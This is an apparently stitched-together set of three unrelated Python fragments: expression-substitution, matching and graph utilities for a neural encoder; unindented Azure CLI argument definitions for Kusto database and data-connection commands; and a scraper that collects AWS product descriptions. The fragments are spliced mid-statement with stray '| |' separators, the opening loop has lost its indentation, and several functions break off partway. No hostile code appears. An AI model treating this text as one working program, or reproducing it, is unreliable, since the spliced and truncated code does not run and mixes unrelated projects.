for cl, inds in clusters.items():
medioid = [-math.inf, -1]
for i in range(len(exprs)):
s_sum = sum([wts[i][j][0] for j in range(len(exprs))])
if s_sum > medioid[0]: medioid = [s_sum, i]
md_ind = medioid[1]
#md_ind = 0
for j in inds:
sc, subst = wts[md_ind][j]
new_expr = apply_subst(exprs[j], subst)
new_stmts[j] = new_expr
return new_stmts
def find_good_subst(expr_subexprs, alt_info, expr_par_info, alt_par_info,
                    var_hashes):
    """Greedily grow a variable substitution aligning an expression's
    sub-expressions with an alternative's sub-expressions.

    Each round scores every candidate alignment and commits the
    highest-scoring one that binds at least one new variable, until all
    variables are covered or no extension is found.

    Returns:
        (total support score, substitution dict).
    """
    # build up substitution for each expression
    # subst: accumulated mapping; supp_by: per-round winning scores;
    # nogoods: (subexpr-hash, alt-index) pairs known not to extend subst.
    # NOTE(review): `change` is assigned but never read afterwards.
    subst, supp_by, change, nogoods = {}, [], True, set()
    all_vars = set([s for a, h, s in expr_subexprs if a == ('VAR',)])
    while all_vars:
        best_subst = [0, subst]
        for av_k, hash_av_k, subexpr in expr_subexprs:
            if type(subexpr) != tuple: continue
            if not hash_av_k in alt_info: continue
            # Lazily cache the positional variable hashes per sub-expression.
            if not subexpr in var_hashes:
                var_hashes[subexpr] = {}
                get_var_hashes(subexpr, var_hashes[subexpr])
            s1_hashes = var_hashes[subexpr]
            for a_i, alt_subexpr in enumerate(alt_info[hash_av_k]):
                if (hash_av_k, a_i) in nogoods: continue
                if is_rn_var(alt_subexpr):
                    if get_var_name(alt_subexpr) == get_var_name(subexpr): a_sc = 2
                    else: a_sc = 1
                    # NOTE(review): the 2/1 name-match score above is
                    # immediately overwritten below — dead code; confirm
                    # which scoring was intended.
                    a_sc = match_par_info(expr_par_info[subexpr],
                                          alt_par_info[alt_subexpr])
                else: a_sc = len(av_k)
                if a_sc <= best_subst[0]: continue
                if not alt_subexpr in var_hashes:
                    var_hashes[alt_subexpr] = {}
                    get_var_hashes(alt_subexpr, var_hashes[alt_subexpr])
                s2_hashes = var_hashes[alt_subexpr]
                fnd_subst = find_valid_subst(s1_hashes, s2_hashes, dict(subst))
                # Only accept extensions that bind at least one new variable;
                # otherwise remember this pairing as a dead end.
                if fnd_subst != False and any(not k in subst for k in fnd_subst.keys()):
                    best_subst = [a_sc, fnd_subst]
                else: nogoods.add((hash_av_k, a_i))
        # exit if nothing found
        if best_subst[0] == 0: break
        supp_by.append(best_subst[0])
        subst = best_subst[1]
        for k in subst.keys():
            if k in all_vars: all_vars.remove(k)
    return np.sum(supp_by), subst
def match_par_info(se1_info, se2_info):
    """Count how many parent-info entries of se1_info also occur in se2_info."""
    return sum(1 for entry in se1_info if entry in se2_info)
def find_good_subst_2(expr_subexprs, alt_info, expr_par_info, alt_par_info,
                      var_hashes):
    """Single-pass variant of find_good_subst: accepts the first valid
    substitution extension per sub-expression instead of greedily picking
    the best.

    NOTE(review): expr_par_info and alt_par_info are accepted but unused
    here, and unlike find_good_subst this skips *tuple* sub-expressions
    (leaf-only alignment) — confirm the asymmetry is intended.

    Returns:
        (total support score, substitution dict).
    """
    # build up substitution for each expression
    subst, supp_by = {}, []
    for av_k, hash_av_k, subexpr in expr_subexprs:
        if type(subexpr) == tuple: continue
        if not hash_av_k in alt_info: continue
        # Lazily cache the positional variable hashes per sub-expression.
        if not subexpr in var_hashes:
            var_hashes[subexpr] = {}
            get_var_hashes(subexpr, var_hashes[subexpr])
        s1_hashes = var_hashes[subexpr]
        for alt_subexpr in alt_info[hash_av_k]:
            if not alt_subexpr in var_hashes:
                var_hashes[alt_subexpr] = {}
                get_var_hashes(alt_subexpr, var_hashes[alt_subexpr])
            s2_hashes = var_hashes[alt_subexpr]
            fnd_subst = find_valid_subst(s1_hashes, s2_hashes, dict(subst))
            # Accept any extension that binds at least one new variable.
            if fnd_subst != False and any(not k in subst for k in fnd_subst.keys()):
                subst = fnd_subst
                supp_by.append(len(av_k))
    return np.sum(supp_by), subst
def apply_subst(expr, subst):
    """Recursively apply a variable substitution to an expression tree.

    Tuples are (op, arg1, ...) nodes whose head is kept as-is; leaves are
    strings, returned as fresh copies so callers never alias the
    substitution's values.
    """
    if type(expr) == tuple:
        head = expr[0]
        rebuilt_args = tuple(apply_subst(arg, subst) for arg in expr[1:])
        return (head,) + rebuilt_args
    replacement = subst.get(expr, expr)
    return replacement + ''
def find_valid_subst(e1_hashes, e2_hashes, subst=None):
    """Find a bijective entity substitution consistent with the hash labels.

    Args:
        e1_hashes: dict mapping entities of the first expression to hashes.
        e2_hashes: dict mapping entities of the second expression to hashes.
        subst: optional existing substitution to extend; it is only mutated
            once a full matching has been found.

    Returns:
        the extended substitution dict on success, or False when no perfect
        bipartite matching exists (callers compare the result against False).
    """
    if subst is None:
        subst = {}
    rev_subst = {v: k for k, v in subst.items()}
    # Work on copies: matched entries are deleted as we go.
    e1_hashes, e2_hashes = dict(e1_hashes), dict(e2_hashes)
    # we require a perfect bipartite matching to be considered alpha-equivalent
    if len(e1_hashes) != len(e2_hashes):
        return False
    assignments = set()
    for ent1, c_hv in e1_hashes.items():
        # Use None (not False) as the "no match" sentinel so falsy entities
        # such as 0 cannot be mistaken for a failed search (0 == False).
        found = None
        for ent2, p_hv in e2_hashes.items():
            if c_hv != p_hv:
                continue
            if is_rn_var(ent1) != is_rn_var(ent2):
                continue
            # Respect any bindings already fixed in the incoming substitution.
            if ent1 in subst and subst[ent1] != ent2:
                continue
            if ent2 in rev_subst and rev_subst[ent2] != ent1:
                continue
            # Variables may map to any compatible entity; constants only to
            # themselves.
            if is_rn_var(ent1) or ent1 == ent2:
                found = ent2
                break
        if found is None:
            return False
        assignments.add((ent1, found))
        del e2_hashes[found]
    # if we get here, e2_hashes should have been fully consumed
    if e2_hashes:
        return False
    for a, b in assignments:
        subst[a] = b
    return subst
def get_var_hashes(expr, hashes, src_hash=None):
    """Accumulate a structural hash for every leaf entity of an expression.

    Walks the tree; each leaf's entry in ``hashes`` mixes the hash of the
    root-to-leaf path (edge labels) into the leaf's base hash, so
    structurally different positions yield different values.

    Args:
        expr: expression tree — tuples for (op, args...) nodes, strings for
            leaves.
        hashes: dict updated in place, mapping leaf entity -> running hash.
        src_hash: hash of the path from the root down to ``expr``
            (0 at the root).
    """
    if src_hash is None:
        src_hash = 0
    if (not is_rn_var(expr)) and type(expr) == tuple:
        lead = (expr[0], len(expr))
        for i, el in enumerate(expr):
            if i == 0:
                continue
            # partial ordering edge labels will account for orderedness of lead
            edge_hash = hash((lead, i))
            new_src_hash = hash(src_hash + edge_hash)
            get_var_hashes(el, hashes, new_src_hash)
    else:
        # Leaf: renamable variables share the ('VAR', 0) base label so they
        # hash alpha-invariantly; constants hash on their own name.
        if is_rn_var(expr):
            lead = ('VAR', 0)
        else:
            lead = (expr, 0)
        if expr not in hashes:
            hashes[expr] = hash(lead)
        hashes[expr] += hash(src_hash + hashes[expr])
#################
# Matching utilities
#################
def maximal_var_subst(paths1, paths2):
    """Greedy maximum-weight matching between variables of two path profiles.

    Scores every (var in paths1, key in paths2) pair by path-profile
    similarity, then repeatedly commits the highest-weight pair and discards
    all remaining pairs touching either matched endpoint.

    Returns:
        (total matched weight, dict mapping paths1 vars to paths2 keys).
    """
    all_wts = []
    for p_k, p_paths in paths1.items():
        # Only renamable variables on the left side are match candidates.
        if not is_rn_var(p_k): continue
        for c_k, c_paths in paths2.items():
            pc_wt = get_alignment_score(p_paths, c_paths)
            if pc_wt > 0: all_wts.append((p_k, c_k, pc_wt))
    score_of, var_subst = 0, {}
    while all_wts:
        best_l, best_r, best_wt = max(all_wts, key=lambda x : x[2])
        var_subst[best_l] = best_r
        # Drop every remaining pair that reuses either matched endpoint.
        all_wts = [(l, r, w) for l, r, w in all_wts
                   if l != best_l and r != best_r]
        score_of += best_wt
    return score_of, var_subst
def get_alignment_score(p_paths, c_paths, cos=True):
    """Similarity of two sparse path-count vectors.

    Returns the cosine similarity when ``cos`` is True (0 when either vector
    has zero norm), otherwise the raw dot product.
    """
    dot_prod = sparse_dot_prod(p_paths, c_paths)
    if not cos:
        return dot_prod
    n1 = np.sqrt(sum(x[1] ** 2 for x in p_paths))
    n2 = np.sqrt(sum(x[1] ** 2 for x in c_paths))
    norm_prod = n1 * n2
    if norm_prod == 0:
        return 0
    return dot_prod / norm_prod
def sparse_dot_prod(lst1, lst2):
    """Dot product of two sparse vectors given as key-sorted (key, value) lists."""
    total = 0
    i = j = 0
    len1, len2 = len(lst1), len(lst2)
    # Classic sorted-merge walk over both key lists.
    while i < len1 and j < len2:
        k1, v1 = lst1[i]
        k2, v2 = lst2[j]
        if k1 == k2:
            total += v1 * v2
            i += 1
            j += 1
        elif k1 < k2:
            i += 1
        else:
            j += 1
    return total
def get_paths_upto(set_lst, prov, path_len=3, just_syms=True, dp_form=True, all_len=True):
    """Enumerate provenance paths of length up to ``path_len`` from each seed.

    Args:
        set_lst: seed elements; each one starts a path.
        prov: dict mapping an element to the elements it derives from.
        path_len: maximum number of elements per path.
        just_syms: reduce tuple elements to their leading symbol.
        dp_form: return sorted (joined-path, count) pairs ('___'-joined)
            instead of raw path lists.
        all_len: also keep every shorter prefix, not just maximal paths.

    Returns:
        a list of paths, or sorted (key, count) pairs when ``dp_form``.
    """
    frontier = [[seed] for seed in set_lst]
    collected = []
    for _ in range(path_len - 1):
        extended = []
        for path in frontier:
            tail = path[-1]
            if tail in prov:
                for nxt in prov[tail]:
                    extended.append(path + [nxt])
            if all_len:
                collected.append(path)
        frontier = extended
    ret_paths = collected + frontier
    if just_syms:
        ret_paths = [[(el[0] if type(el) == tuple else el) for el in path]
                     for path in ret_paths]
    if not dp_form:
        return ret_paths
    counts = {}
    for path in ret_paths:
        key = '___'.join(path)
        counts[key] = counts.get(key, 0) + 1
    return sorted(counts.items(), key=lambda kv: kv[0])
#################
# Graph utilities
#################
def topologically_group(graph):
    """Layer the nodes of a DAG topologically, leaves first.

    Peels off nodes with no remaining predecessors layer by layer, then
    reorders the result so that all leaf nodes (out-degree 0) form the very
    first layer and root nodes end up in the very last.

    NOTE: assumes ``graph`` is acyclic — a cycle would leave the peeling
    loop with no ready nodes and it would never terminate.
    """
    pending_parents = {}
    for node in graph.nodes:
        pending_parents.setdefault(node, set())
        for parent in graph.predecessors(node):
            pending_parents[node].add(parent)
        # should be redundant, but just in case...
        for child in graph.successors(node):
            pending_parents.setdefault(child, set()).add(node)
    # Peel layers of nodes whose parents have all been emitted already.
    layers = []
    remaining = list(graph.nodes)
    while remaining:
        ready = [node for node in remaining if not pending_parents[node]]
        for node in ready:
            for child in graph.successors(node):
                pending_parents[child].discard(node)
        ready_set = set(ready)
        remaining = [node for node in remaining if node not in ready_set]
        layers.append(ready)
    # Reverse the layer order and split out the leaves so leaf nodes form
    # the very first layer and roots the very last.
    leaf_nodes, inner_layers = [], []
    for layer in reversed(layers):
        internal = [node for node in layer if graph.out_degree(node)]
        leaf_nodes.extend(node for node in layer if not graph.out_degree(node))
        if internal:
            inner_layers.append(internal)
    grouped = [leaf_nodes] + inner_layers
    assert len(set(el for lst in grouped for el in lst)) == len(graph.nodes)
    return grouped
#################
# Encoder utilities
#################
def flip_upd_layers(upd_layers):
    """Reverse the direction of a layered update schedule.

    Drops entries with no destination, flips every (src, dst, edge) triple
    to (dst, src, edge), reverses the layer order, and prepends a layer of
    the original roots (sources that never appear as destinations) with
    empty destination/edge slots.
    """
    kept_layers = []
    for layer in upd_layers:
        kept = [(src, dst, edge) for src, dst, edge in layer if dst is not None]
        if kept:
            kept_layers.append(kept)
    dests = set(dst for layer in kept_layers for _, dst, _ in layer)
    srcs = set(src for layer in kept_layers for src, _, _ in layer)
    roots = [(src, None, None) for src in srcs.difference(dests)]
    flipped = [[(dst, src, edge) for src, dst, edge in layer]
               for layer in reversed(kept_layers)]
    return [layer for layer in ([roots] + flipped) if layer]
def add_zv_to_no_deps(dir_upd_layer, node_zv, edge_zv):
    """Fill dependency-less entries with zero-vector placeholders.

    Entries whose 'add' slot is None get ``node_zv``/``edge_zv`` substituted
    for the missing node and edge; other entries pass through unchanged.
    """
    return [(src, node_zv, edge_zv) if add is None else (src, add, edge)
            for src, add, edge in dir_upd_layer]
#################
# PyTorch utilities
#################
def get_adj_matr(pairs, size, is_cuda=False, mean=False, gcn_agg=None):
    """Build a sparse adjacency matrix from (src, dst) index pairs.

    Args:
        pairs: list of (src, dst) index pairs (the nonzero coordinates).
        size: torch.Size of the resulting sparse matrix.
        is_cuda: place the tensor on GPU when True.
        mean: weight each entry by 1/out-count of its source row (row
            entries sum to 1); ignored when gcn_agg is given.
        gcn_agg: optional dict of GCN normalization factors keyed by
            (0, src) and (1, dst); each entry is weighted by
            1 / (gcn_agg[(0, src)] * gcn_agg[(1, dst)]).

    Returns:
        a sparse FloatTensor of the given size.
    """
    # Pick the CPU or CUDA tensor factories once instead of branching at
    # every construction site.
    long_tensor = torch.cuda.LongTensor if is_cuda else torch.LongTensor
    float_tensor = torch.cuda.FloatTensor if is_cuda else torch.FloatTensor
    sparse_tensor = (torch.cuda.sparse.FloatTensor if is_cuda
                     else torch.sparse.FloatTensor)
    i = long_tensor(pairs)
    if gcn_agg is not None:
        v = float_tensor([1 / (gcn_agg[(0, src)] * gcn_agg[(1, add)])
                          for src, add in pairs])
    elif mean:
        # Count how many entries share each source row so that the nonzeros
        # of a row average (sum to 1).
        src_ct = {}
        for src, _ in pairs:
            src_ct[src] = src_ct.get(src, 0) + 1
        v = float_tensor([1 / src_ct[src] for src, _ in pairs])
    else:
        v = float_tensor([1 for _ in range(len(pairs))])
    return sparse_tensor(i.t(), v, size)
def compute_att_aggr(node_matr, pairs, W_q, W_k, b_q, device, softmax=True):
all_ms, at_src | |
'User']), help='Principal type.')
with self.argument_context('kusto database-principal-assignment update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.', id_part='name')
c.argument('database_name', help='The name of the database in the Kusto cluster.', id_part='child_name_1')
c.argument('principal_assignment_name', help='The name of the Kusto principalAssignment.', id_part='child_name_'
'2')
c.argument('principal_id', help='The principal ID assigned to the database principal. It can be a user email, a'
'pplication ID, or security group name.')
c.argument('role', arg_type=get_enum_type(['Admin', 'Ingestor', 'Monitor', 'User', 'UnrestrictedViewers', 'View'
'er']), help='Database principal role.')
c.argument('tenant_id', help='The tenant id of the principal')
c.argument('principal_type', arg_type=get_enum_type(['App', 'Group', 'User']), help='Principal type.')
with self.argument_context('kusto database-principal-assignment delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.', id_part='name')
c.argument('database_name', help='The name of the database in the Kusto cluster.', id_part='child_name_1')
c.argument('principal_assignment_name', help='The name of the Kusto principalAssignment.', id_part='child_name_'
'2')
with self.argument_context('kusto database-principal-assignment wait') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.', id_part='name')
c.argument('database_name', help='The name of the database in the Kusto cluster.', id_part='child_name_1')
c.argument('principal_assignment_name', help='The name of the Kusto principalAssignment.', id_part='child_name_'
'2')
with self.argument_context('kusto attached-database-configuration list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.')
with self.argument_context('kusto attached-database-configuration show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.', id_part='name')
c.argument('attached_database_configuration_name', help='The name of the attache'
'd database configuration.', id_part='child_name_1')
with self.argument_context('kusto attached-database-configuration create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.')
c.argument('attached_database_configuration_name', help='The name of the attache'
'd database configuration.')
c.argument('location', arg_type=get_location_type(self.cli_ctx),
validator=get_default_location_from_resource_group)
c.argument('database_name', help='The name of the database which you would like to attach, use * if you want to'
' follow all current and future databases.')
c.argument('cluster_resource_id', help='The resource id of the cluster where the databases you would like to at'
'tach reside.')
c.argument('default_principals_modification_kind', arg_type=get_enum_type(['Union', 'Replace', 'None']), help='The default principals modification kind')
with self.argument_context('kusto attached-database-configuration update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.')
c.argument('attached_database_configuration_name', help='The name of the attached database configuration.')
c.argument('location', arg_type=get_location_type(self.cli_ctx),
validator=get_default_location_from_resource_group)
c.argument('database_name', help='The name of the database which you would like to attach, use * if you want to'
' follow all current and future databases.')
c.argument('cluster_resource_id', help='The resource id of the cluster where the databases you would like to at'
'tach reside.')
c.argument('default_principals_modification_kind', arg_type=get_enum_type(['Union', 'Replace', 'None']), help='The default principals modification kind')
with self.argument_context('kusto attached-database-configuration delete') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.', id_part='name')
c.argument('attached_database_configuration_name', help='The name of the attache'
'd database configuration.', id_part='child_name_1')
with self.argument_context('kusto attached-database-configuration wait') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.', id_part='name')
c.argument('attached_database_configuration_name', help='The name of the attache'
'd database configuration.', id_part='child_name_1')
with self.argument_context('kusto data-connection list') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.')
c.argument('database_name', help='The name of the database in the Kusto cluster.')
with self.argument_context('kusto data-connection show') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.', id_part='name')
c.argument('database_name', help='The name of the database in the Kusto cluster.', id_part='child_name_1')
c.argument('data_connection_name', help='The name of the data connection.',
id_part='child_name_2')
with self.argument_context('kusto data-connection event-grid create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.')
c.argument('database_name', help='The name of the database in the Kusto cluster.')
c.argument('data_connection_name', help='The name of the data connection.')
c.argument('location', arg_type=get_location_type(self.cli_ctx),
validator=get_default_location_from_resource_group)
c.argument('storage_account_resource_id',
help='The resource ID of the storage account where the data resides.')
c.argument('event_hub_resource_id', help='The resource ID where the event grid is configured to send events.')
c.argument('consumer_group', help='The event hub consumer group.')
c.argument('table_name', help='The table where the data should be ingested. Optionally the table information ca'
'n be added to each message.')
c.argument('mapping_rule_name', help='The mapping rule to be used to ingest the data. Optionally the mapping in'
'formation can be added to each message.')
c.argument('data_format', arg_type=get_enum_type(['MULTIJSON', 'JSON', 'CSV', 'TSV', 'SCSV', 'SOHSV', 'PSV', 'T'
'XT', 'RAW', 'SINGLEJSON', 'AVRO', 'TSVE', 'PARQUET', 'ORC', 'APACHEAVRO', 'W3CLOGFILE']), help='The'
' data format of the message. Optionally the data format can be added to each message.')
c.argument('ignore_first_record', arg_type=get_three_state_flag(), help='A Boolean value that, if set to true, '
'indicates that ingestion should ignore the first record of every file')
c.argument('blob_storage_event_type', arg_type=get_enum_type(['Microsoft.Storage.BlobCreated', 'Microsoft.Stora'
'ge.BlobRenamed']), help='The name of blob storage event type to process.')
with self.argument_context('kusto data-connection event-hub create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.')
c.argument('database_name', help='The name of the database in the Kusto cluster.')
c.argument('data_connection_name', help='The name of the data connection.')
c.argument('location', arg_type=get_location_type(self.cli_ctx),
validator=get_default_location_from_resource_group)
c.argument('event_hub_resource_id', help='The resource ID of the event hub to be used to create a data connecti'
'on.')
c.argument('consumer_group', help='The event hub consumer group.')
c.argument('table_name', help='The table where the data should be ingested. Optionally the table information ca'
'n be added to each message.')
c.argument('mapping_rule_name', help='The mapping rule to be used to ingest the data. Optionally the mapping in'
'formation can be added to each message.')
c.argument('data_format', arg_type=get_enum_type(['MULTIJSON', 'JSON', 'CSV', 'TSV', 'SCSV', 'SOHSV', 'PSV', 'T'
'XT', 'RAW', 'SINGLEJSON', 'AVRO', 'TSVE', 'PARQUET', 'ORC', 'APACHEAVRO', 'W3CLOGFILE']), help='The'
' data format of the message. Optionally the data format can be added to each message.')
c.argument('event_system_properties', nargs='+', help='System properties of the event hub')
c.argument('compression', arg_type=get_enum_type(['None', 'GZip']), help='The event hub messages compression ty'
'pe')
with self.argument_context('kusto data-connection iot-hub create') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.')
c.argument('database_name', help='The name of the database in the Kusto cluster.')
c.argument('data_connection_name', help='The name of the data connection.')
c.argument('location', arg_type=get_location_type(self.cli_ctx),
validator=get_default_location_from_resource_group)
c.argument('iot_hub_resource_id',
help='The resource ID of the Iot hub to be used to create a data connection.')
c.argument('consumer_group', help='The iot hub consumer group.')
c.argument('table_name', help='The table where the data should be ingested. Optionally the table information ca'
'n be added to each message.')
c.argument('mapping_rule_name', help='The mapping rule to be used to ingest the data. Optionally the mapping in'
'formation can be added to each message.')
c.argument('data_format', arg_type=get_enum_type(['MULTIJSON', 'JSON', 'CSV', 'TSV', 'SCSV', 'SOHSV', 'PSV', 'T'
'XT', 'RAW', 'SINGLEJSON', 'AVRO', 'TSVE', 'PARQUET', 'ORC', 'APACHEAVRO', 'W3CLOGFILE']), help='The'
' data format of the message. Optionally the data format can be added to each message.')
c.argument('event_system_properties', nargs='+', help='System properties of the iot hub')
c.argument('shared_access_policy_name', help='The name of the share access policy')
with self.argument_context('kusto data-connection event-grid update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.', id_part='name')
c.argument('database_name', help='The name of the database in the Kusto cluster.', id_part='child_name_1')
c.argument('data_connection_name', help='The name of the data connection.',
id_part='child_name_2')
c.argument('location', arg_type=get_location_type(self.cli_ctx),
validator=get_default_location_from_resource_group)
c.argument('storage_account_resource_id',
help='The resource ID of the storage account where the data resides.')
c.argument('event_hub_resource_id', help='The resource ID where the event grid is configured to send events.')
c.argument('consumer_group', help='The event hub consumer group.')
c.argument('table_name', help='The table where the data should be ingested. Optionally the table information ca'
'n be added to each message.')
c.argument('mapping_rule_name', help='The mapping rule to be used to ingest the data. Optionally the mapping in'
'formation can be added to each message.')
c.argument('data_format', arg_type=get_enum_type(['MULTIJSON', 'JSON', 'CSV', 'TSV', 'SCSV', 'SOHSV', 'PSV', 'T'
'XT', 'RAW', 'SINGLEJSON', 'AVRO', 'TSVE', 'PARQUET', 'ORC', 'APACHEAVRO', 'W3CLOGFILE']), help='The'
' data format of the message. Optionally the data format can be added to each message.')
c.argument('ignore_first_record', arg_type=get_three_state_flag(), help='A Boolean value that, if set to true, '
'indicates that ingestion should ignore the first record of every file')
c.argument('blob_storage_event_type', arg_type=get_enum_type(['Microsoft.Storage.BlobCreated', 'Microsoft.Stora'
'ge.BlobRenamed']), help='The name of blob storage event type to process.')
with self.argument_context('kusto data-connection event-hub update') as c:
c.argument('resource_group_name', resource_group_name_type)
c.argument('cluster_name', help='The name of the Kusto cluster.', id_part='name')
c.argument('database_name', help='The name of the database in the Kusto cluster.', id_part='child_name_1')
c.argument('data_connection_name', help='The name of the data connection.',
id_part='child_name_2')
c.argument('location', arg_type=get_location_type(self.cli_ctx),
validator=get_default_location_from_resource_group)
c.argument('event_hub_resource_id', help='The resource ID of the event hub to be used to create a data connecti'
'on.')
c.argument('consumer_group', help='The event hub consumer group.')
c.argument('table_name', help='The table where the data should be ingested. Optionally the table information ca'
'n be added to each message.')
c.argument('mapping_rule_name', help='The mapping rule to be used to ingest the data. Optionally the mapping in'
'formation can be added to each message.')
c.argument('data_format', arg_type=get_enum_type(['MULTIJSON', 'JSON', 'CSV', 'TSV', 'SCSV', 'SOHSV', 'PSV', 'T'
'XT', 'RAW', 'SINGLEJSON', 'AVRO', 'TSVE', 'PARQUET', 'ORC', 'APACHEAVRO', 'W3CLOGFILE']), help='The'
' data format of the message. Optionally the data format can be added to each message.')
c.argument('event_system_properties', nargs='+', help='System properties of the event hub')
c.argument('compression', arg_type=get_enum_type(['None', | |
import json
import html
import sys
import re
import urllib.parse
from urllib.parse import unquote
from time import sleep
from typing import Dict, List
from bs4 import BeautifulSoup
from requests import get
# This script extracts a list of product item dicts.
# It is used by tweet.py to generate a corpus.
# It only needs to be run to refresh aws.json,
# which is included in the Docker image.
# The number of paragraphs of each product page to scrape.
# The more we add, the less relevant the text becomes.
PARAGRAPHS = 1
def get_items() -> List[Dict]:
    """Scrape https://aws.amazon.com/products/ for AWS product entries.

    Returns:
        A list of dicts with keys ``name`` (product title), ``blurb``
        (one-line subtitle) and ``desc`` (first PARAGRAPHS paragraphs of
        the product page).
    """
    items = []
    names = []
    # Get main Webpage
    url = "https://aws.amazon.com/products/"
    r = get(url)
    # Extract product <div> list, e.g.
    # <div class="lb-content-item">
    #  <a href="/cloudwatch/?c=15&pt=1"> <i></i>
    #    <span>Amazon CloudWatch</span>
    #    <cite>Monitor Resources and Applications</cite>
    #  </a>
    # </div>
    soup = BeautifulSoup(r.text, "html.parser")
    divs = soup.find_all("div", class_="lb-content-item")
    # Structure
    # {<item name>: <item desc>}
    for d in divs:
        product = dict()
        # Title (name) and subtitle (blurb)
        product["name"] = d.a.span.text.strip()
        product["blurb"] = d.a.cite.text.strip()
        # Each product can exist in many main page
        # categories, ignore subsequent ones
        if product["name"] in names:
            continue
        # Throttle only when we actually fetch a page (the original
        # slept one second even for skipped duplicates).
        sleep(1)
        # Get product Webpage
        print("Getting", product["name"])
        product_path = d.a["href"]
        r = get(urllib.parse.urljoin(url, product_path))
        # Extract product description
        soup = BeautifulSoup(r.text, "html.parser")
        # 1. Old product page, all <p> elements under div.lead
        #    e.g. https://aws.amazon.com/cloudsearch/
        p = [x.text.strip() for x in soup.select("div.lead p")[:PARAGRAPHS]]
        if not p:
            # 2. New product page: no distinct structure, but the first
            #    <p> elements have the description
            #    e.g. https://aws.amazon.com/athena/
            p = [x.text.strip() for x in soup.select("p")[:PARAGRAPHS]]
        product["desc"] = " ".join(p)
        names.append(product["name"])
        items.append(product)
    return items
def get_docs_items() -> List[Dict]:
    """Scrape https://docs.aws.amazon.com for AWS product entries.

    Returns:
        A list of dicts with keys ``name``, ``blurb``, ``abbreviation``
        and ``desc``.  Extra product names discovered in <section>
        titles and <dt> terms are appended as name-only entries.
    """
    # Main list of services
    items = []
    # List to keep track of already fetched products
    # to prevent fetching them more than once
    names = []
    # List of extra "sub-genre" names to add to the list of names
    # e.g. "Amazon Kinesis Data Firehose" or all the SageMakers
    extra_names = []
    # Get main Webpage docs XML
    main_url = "https://docs.aws.amazon.com"
    main_xml = get_page_xml(main_url)
    main_soup = BeautifulSoup(main_xml, "lxml")
    services = main_soup.find_all("service")
    """
    <tile>
      <title>AWS Management Console</title>
      <services>
        <service href="/awsconsolehelpdocs/latest/gsg/getting-started.html?id=docs_gateway">
          <prefix></prefix>
          <name>Getting Started with the Console</name>
          [...]
      </services>
    </tile>
    <tile>
    """
    # aka 'tiles'
    # Sections of https://docs.aws.amazon.com that aren't products per se
    sections_to_skip = [
        "General Reference",
        "AWS Management Console",
        "SDKs & Toolkits",
        "Additional Resources",
    ]
    for s in services:
        service = {
            "name": "",
            "blurb": "",
            "abbreviation": "",
            "desc": ""
        }
        # Skip the sections that aren't products per se.
        # Section titles are HTML-escaped
        section_title = s.parent.parent.title.string
        if html.unescape(section_title) in sections_to_skip:
            continue
        # Service href
        # Skip absolute product links (non-docs sites)
        href = s["href"]
        if not href.startswith("/"):
            continue
        # Name in the main XML doc
        name = s.find("name").string
        # Each product can exist in many main page
        # sections, ignore subsequent ones
        if name in names:
            continue
        # Link names ending in "Overview" aren't really names
        if name.endswith("Overview"):
            continue
        print(f"Processing {name}...")
        # Get service landing page
        sleep(0.5)
        service_url = urllib.parse.urljoin(main_url, href)
        service_xml = get_page_xml(service_url)
        if service_xml is None:
            continue
        service_soup = BeautifulSoup(service_xml, "lxml")
        """
        <landing-page>
          <title>Amazon Elastic Compute Cloud Documentation</title>
          <titleabbrev>Amazon EC2</titleabbrev>
          <abstract>Amazon Elastic Compute Cloud (Amazon EC2) is a [...]</abstract>
          [...]
          <main-area>
            <sections>
              <section id="amazon-ec2">
                <title>Amazon EC2</title>
                <tiles>
                  <tile href="/AWSEC2/latest/UserGuide/">
                    <title>User Guide for Linux Instances</title>
                    <abstract> Describes key [...]</abstract>
                    <more-links/>
                  </tile>
              </section>
              [...]
            </sections>
          </main-area>
          [...]
        </landing-page>
        """
        # Service name
        # Page title is "<product> Documentation", remove " Documentation"
        page_title = service_soup.find("landing-page").title.string
        service_name = re.sub(r" Documentation$", "", page_title)
        service["name"] = service_name
        # Service blurb
        # Some landing pages don't have descriptions, so the whole
        # extraction (including the <abstract> access, which the
        # original left outside the try and could crash on) is guarded.
        try:
            service_blurb = service_soup.find("landing-page").abstract.string
            # Remove extra newlines found in the XML
            service_blurb = " ".join(service_blurb.split())
            # BUG FIX: re-encode the *actual* blurb text; the original
            # round-tripped the still-empty placeholder, so the fix
            # never applied. https://stackoverflow.com/a/66815577
            bytes_blurb = bytes(service_blurb, encoding="raw_unicode_escape")
            service["blurb"] = bytes_blurb.decode("utf-8", "strict")
        except (AttributeError, TypeError, UnicodeDecodeError):
            service["blurb"] = ""
        # Service abbreviation (e.g. 'Amazon EC2')
        # NOTE(review): assumes every landing page has <titleabbrev> — confirm
        service["abbreviation"] = service_soup.find("landing-page").titleabbrev.string
        # <section> names often contain extra AWS product names!
        # Only if they start with "AWS", "Amazon"
        # e.g. AWS Lambda Data Firehose
        sections = service_soup.find_all("section")
        try:
            # BUG FIX: clean each title string (the original called
            # .split() on the *list*, which always raised and silently
            # emptied the result), then filter on the strings, not on
            # the Tag objects, with explicit precedence.
            sections_titles = [" ".join(sec.title.text.split()) for sec in sections]
            sections_titles = [
                st
                for st in sections_titles
